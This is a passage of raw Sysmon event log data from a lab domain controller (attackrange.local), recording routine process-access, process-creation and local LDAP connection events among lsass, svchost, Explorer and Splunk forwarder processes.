.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.970{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k AppReadinessC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000004644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.957{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.957{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.942{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.942{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.786{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000004637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.493{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53576-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.493{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53576-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.485{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53575-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000004634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.485{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53575-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 10341000x80000000000000004633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.646{266CAFBE-64C5-6064-A600-00000000AE01}45443212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.506{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.506{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C5-6064-A600-00000000AE01}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.490{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.490{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C5-6064-A600-00000000AE01}4544C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.490{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C5-6064-A600-00000000AE01}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.492{266CAFBE-64C5-6064-A600-00000000AE01}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.475{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.475{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 